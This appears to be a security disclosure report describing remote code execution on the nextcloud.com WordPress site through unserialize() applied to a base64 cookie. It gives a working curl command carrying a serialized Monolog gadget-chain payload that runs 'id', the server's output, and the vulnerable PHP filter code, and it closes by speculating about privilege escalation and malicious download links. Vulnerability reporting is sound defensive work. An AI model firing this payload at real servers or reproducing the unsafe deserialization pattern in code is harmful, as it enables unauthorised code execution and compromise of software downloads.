There is a trivial to exploit Remote Code Execution on nextcloud.com due to unserializing user input.
The following command will execute the system('id')
command on the host. As gadget chain Iāve used Monolog which is included in the PodLove WordPress plugin used on nextcloud.com:
curl -i -s -k -X $'GET' \
-H $'Host: nextcloud.com' \
-b $'nc_cookie_banner={\"essentials\":true,\"convenience\":false,\"statistics\":{\"matomo\":false},\"external_media\":{\"youtube\":false,\"vimeo\":false}}; wp-wpml_current_language=en; nc_form_fields=TzozNzoiTW9ub2xvZ1xIYW5kbGVyXEZpbmdlcnNDcm9zc2VkSGFuZGxlciI6NDp7czoxNjoiACoAcGFzc3RocnVMZXZlbCI7aTowO3M6MTA6IgAqAGhhbmRsZXIiO3I6MTtzOjk6IgAqAGJ1ZmZlciI7YToxOntpOjA7YToyOntpOjA7czoyOiJpZCI7czo1OiJsZXZlbCI7aToxMDA7fX1zOjEzOiIAKgBwcm9jZXNzb3JzIjthOjI6e2k6MDtzOjM6InBvcyI7aToxO3M6Njoic3lzdGVtIjt9fQ==' \
$'https://nextcloud.com/newsletter/'
The last line of the response will contain the output of the id
command:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
The unserialize
call in the below code paths is performed on user-input. ($_COOKIE['nc_form_fields']
)
add_filter( 'ninja_forms_render_default_value', 'nc_change_nf_default_value', 10, 3 );
function nc_change_nf_default_value( $default_value, $field_type, $field_settings ) {
if(isset($_COOKIE['nc_form_fields'])){
$nc_form_fields = unserialize(base64_decode($_COOKIE['nc_form_fields']));
if( str_contains($field_settings['key'], 'name') && !str_contains($field_settings['key'], 'organization') ){
if(isset($nc_form_fields['nc_form_name'])) {
$default_value = $nc_form_fields['nc_form_name'];
}
}
if( str_contains($field_settings['key'], 'email') ){
if(isset($nc_form_fields['nc_form_email'])) {
$default_value = $nc_form_fields['nc_form_email'];
}
}
if( str_contains($field_settings['key'], 'phone') ){
if(isset($nc_form_fields['nc_form_phone'])) {
$default_value = $nc_form_fields['nc_form_phone'];
}
}
}
return $default_value;
}
add_filter( 'ninja_forms_render_options', function( $options, $settings ) {
//https://www.html-code-generator.com/php/array/languages-name-and-code
$languages_list = array(
'en' => 'English',
// [snip]
'zu' => 'Zulu - isiZulu'
);
if(str_contains($settings['key'], 'language')) {
$options = [];
$browser_lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2);
$pref_lang = '';
if(isset($_COOKIE['nc_form_fields'])){
$nc_form_fields = unserialize(base64_decode($_COOKIE['nc_form_fields']));
if( isset($nc_form_fields['nc_form_lang'])){
$pref_lang = $nc_form_fields['nc_form_lang'];
}
} else {
$pref_lang = $browser_lang;
}
foreach($languages_list as $code => $language) {
$selected = false;
if($pref_lang == $code){
$selected = true;
}
$options[] = [
'label' => $language,
'value' => $code,
'calc' => 0,
'selected' => $selected
];
}
}
return $options;
}, 10, 2 );
RCE on the nextcloud.com WordPress instance. I have not tried to escalate up from the host, but Iād assume there is plenty of privilege escalation potential. (or at least the ability to set malicious download links for the Nextcloud binaries)